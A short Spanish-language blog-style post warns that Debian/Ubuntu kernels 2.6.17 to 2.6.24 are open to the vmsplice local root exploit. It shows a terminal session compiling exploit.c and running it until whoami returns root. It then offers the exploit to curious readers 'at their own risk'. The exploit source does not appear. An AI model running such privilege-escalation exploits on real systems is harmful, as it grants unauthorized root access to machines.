Existe un exploit no tan nuevo, pero seguramente de temer para los usuarios Debian/Ubuntu corriendo con un Kernel 2.6.x desde el 2.6.17 hasta el 2.6.24. Lo que lo hace realmente preocupante, es que el kernel que trae Ubuntu Gutsy Gibbon por defecto, es el 2.6.22 -14-generic que es vulnerable a esta explotación local. La buena noticia es que hay hay que saber un poquito de GCC para hacerlo funcionar correctamente y ta ves no cualquier usuario pueda explotar nuestro sistema. Para muestra un botón:

zilus@hackbox:~/$ uname -a
Linux hackbox 2.6.22-14-generic #1 SMP Tue Feb 12 07:42:25 UTC 2008 i686 GNU/Linux

$ gcc exploit.c -o exploit

$ whoami

zilus

Ahora lo bueno:

$ ./exploit

——-——-——-——-

Linux vmsplice Local Root Exploit

By qaaz

——-——-——-——-——-

[+] mmap: 0×0 .. 0×1000

[+] page: 0×0

[+] page: 0×20

[+] mmap: 0×4000 .. 0×5000

[+] page: 0×4000

[+] page: 0×4020

[+] mmap: 0×1000 .. 0×2000

[+] page: 0×1000

[+] mmap: 0xb7d90000 .. 0xb7dc2000

[+] root

$ whoami
root

Si aun siguen curiosos, les dejo el exploit a la mano… úsenlo bajo su responsabilidad. Gracias a milw0rm.com por el tip.